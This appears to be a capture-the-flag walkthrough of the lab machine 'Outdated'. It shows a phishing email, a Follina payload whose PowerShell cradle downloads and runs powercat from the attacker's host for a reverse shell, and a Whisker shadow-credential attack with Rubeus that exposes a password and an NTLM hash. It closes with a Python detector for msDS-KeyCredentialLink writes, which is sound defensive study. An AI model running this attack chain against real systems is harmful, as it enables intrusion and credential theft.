Foothold
Test email
adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO pwndot
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<anton@adot8.com>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 27 Feb 2025 07:11:58 -0600
-> To: itsupport@outdated.htb
-> From: anton@adot8.com
-> Subject: Internal Web App
-> Message-Id: <20250227071158.449184@pwndot>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
->
-> http://10.10.14.18
->
->
-> .
<- 250 Queued (10.890 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
adot@pwndot:~/htb/outdated$ updog -p 80
[+] Serving /home/adot/htb/outdated...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:80
* Running on http://192.168.2.228:80
Press CTRL+C to quit
10.10.11.175 - - [27/Feb/2025 07:12:15] "GET / HTTP/1.1" 200 -
Since the IT support mailbox fetches whatever link it is sent, we can leverage the MS-MSDT "Follina" vulnerability (CVE-2022-30190): the generated exploit.html carries a PowerShell stager that downloads powercat.ps1 from our host and hands us a shell as btables.
adot@pwndot:~/htb/outdated/follina.py$ python follina.py -m command -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.18/powercat.ps1')" -t rtf -u 10.10.14.18
Generated 'clickme.rtf' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://10.10.14.18:80/exploit.html
adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18/exploit.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
<SNIP>
btables:GHKKb7GEHcccdCT8tQV2QwL3
PS C:\Users\btables> whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
OUTDATED\ITStaff Group S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PS C:\Users\btables> .\SharpHound.exe -c all
.\SharpHound.exe -c all
2025-02-27T21:42:44.6514857-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2025-02-27T21:42:44.8858990-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
Compile Whisker, upload it to the box and run it to add a shadow credential (a KeyCredential in msDS-KeyCredentialLink) to the sflowers account:
PS C:\Users\btables> iwr 10.10.14.18/Whisker.exe -o whisker.exe
iwr 10.10.14.18/Whisker.exe -o whisker.exe
PS C:\Users\btables> .\Whisker.exe add /target:sflowers
.\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password NzycSJ15jTkcosRW
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 8b9c4eac-1869-4bdb-aae5-9a660ffde5e2
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers /certificate:<SNIP>
<SNIP>
Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzC... /password:"NzycSJ15jTkcosRW" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5
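The Whisker step works by writing a KeyCredential into the msDS-KeyCredentialLink attribute of the sflowers object, so on the defensive side that attribute write is the thing to audit. The following is an added example, not part of the original writeup, that flags such writes in Windows 5136 "Directory Service Changes" events; the key=value log layout, the sample events and the allow-list of provisioning accounts are constructed assumptions.

```python
import re

# Constructed sample of Windows "Directory Service Changes" events (Event ID 5136),
# flattened to key=value lines the way a SIEM forwarder might emit them. Not real data.
SAMPLE_EVENTS = [
    # the Whisker write from the walkthrough: btables adds a KeyCredential to sflowers
    "EventID=5136 SubjectUserName=btables ObjectDN=CN=Susan Flowers,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674",
    # a computer account updating its own key (normal for device registration)
    "EventID=5136 SubjectUserName=WS01$ ObjectDN=CN=WS01,CN=Computers,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=msDS-KeyCredentialLink OperationType=%%14674",
    # an unrelated attribute change on the same user, must not be flagged
    "EventID=5136 SubjectUserName=btables ObjectDN=CN=Susan Flowers,CN=Users,DC=outdated,DC=htb "
    "AttributeLDAPDisplayName=description OperationType=%%14674",
    # a different event ID that must be ignored
    "EventID=4624 SubjectUserName=sflowers LogonType=3",
]

# key=value pairs; values may contain spaces and commas (DNs), keys are plain words
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
VALUE_ADDED = "%%14674"  # 5136 OperationType resource string for "Value Added"

def parse_event(line):
    return dict(KV_RE.findall(line))

def object_name(dn):
    # value of the first RDN, e.g. "Susan Flowers" from "CN=Susan Flowers,CN=Users,..."
    return dn.split(",", 1)[0].split("=", 1)[1]

def is_self_write(ev):
    # a computer account writing its own object: subject "WS01$" vs RDN "WS01"
    return ev["SubjectUserName"].rstrip("$").lower() == object_name(ev["ObjectDN"]).lower()

def find_shadow_credential_writes(lines, allowed_writers=("svc_keyprovision$",)):
    """Return (subject, target DN) for every msDS-KeyCredentialLink value added by an
    account that is neither the object itself nor a known provisioning identity.
    allowed_writers is an assumed allow-list (constructed name); tune it per environment."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5136":
            continue
        if ev.get("AttributeLDAPDisplayName") != "msDS-KeyCredentialLink":
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        if is_self_write(ev) or ev["SubjectUserName"].lower() in allowed_writers:
            continue
        hits.append((ev["SubjectUserName"], ev["ObjectDN"]))
    return hits
```

Auditing 5136 requires the "Audit Directory Service Changes" subcategory plus a SACL on the user objects for writes to this attribute; without both, the events never appear.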